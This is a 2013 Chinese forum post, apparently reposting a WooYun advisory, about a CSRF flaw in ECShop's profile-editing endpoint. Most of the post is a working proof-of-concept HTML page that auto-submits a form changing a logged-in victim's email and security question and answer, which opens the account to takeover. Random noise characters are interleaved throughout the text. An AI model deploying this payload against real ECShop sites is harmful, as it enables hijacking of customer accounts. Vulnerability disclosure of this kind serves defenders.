找回密码
 立即注册
查看: 2243|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
7 G+ n9 ~  m" }" ]$ Q8 q! V+ }ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现: {! W" e% z: D' V3 Y
$ H6 m8 K5 s/ `3 M& u! L0 ~- X
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
' s; y- h" p( C9 ~% u& i; B
4 |8 ?/ l3 r7 Q; N$ T! l5 b详细说明:& {1 g) |% t" s1 D  Z! I
利用csrf和xss可以突破官方所说的“障碍”
8 ]' R9 |! Z  N# @" y% m7 hxss版本已经有人说明
. P6 o5 Z# G0 f这里给出csrf版本$ ]6 m" x) C5 u) g

0 o& ^2 H  C$ O/ R$ @漏洞证明:, C# F' ?4 f/ j. ~! J
<html>/ ^% f( H( E3 f; ?4 m$ Q$ {- [" E
<body>
, y4 y+ [; L- |4 V<form action="http://www.wooyun.org/ecshop/user.php" method="POST">+ l& Z% I1 z9 k2 H& J
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
0 p9 q1 [5 D+ H7 Z<INPUT TYPE="text" NAME="act" value="act_edit_profile">( s. @3 j4 t, h* m1 G! G
<INPUT TYPE="text" NAME="sel_question" value="ecshop">9 k0 [8 R" o* `
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">3 e. V/ }- {& S( A# `# L  n
</body>
) n  s9 U( B" r1 J<script>- e) I0 v5 r) j: Q
document.forms[0].submit();, g1 Z, d  D- m' |+ E* s5 v
</script>
9 N1 _  }2 x, q8 K1 T* d# }/ \</html>7 R# C0 l+ T+ s  h0 r. Y* A/ i( }
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失# w5 R# S8 K. ^$ I" d& Q& j
" e. N" X0 a- E' x- k4 @$ {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表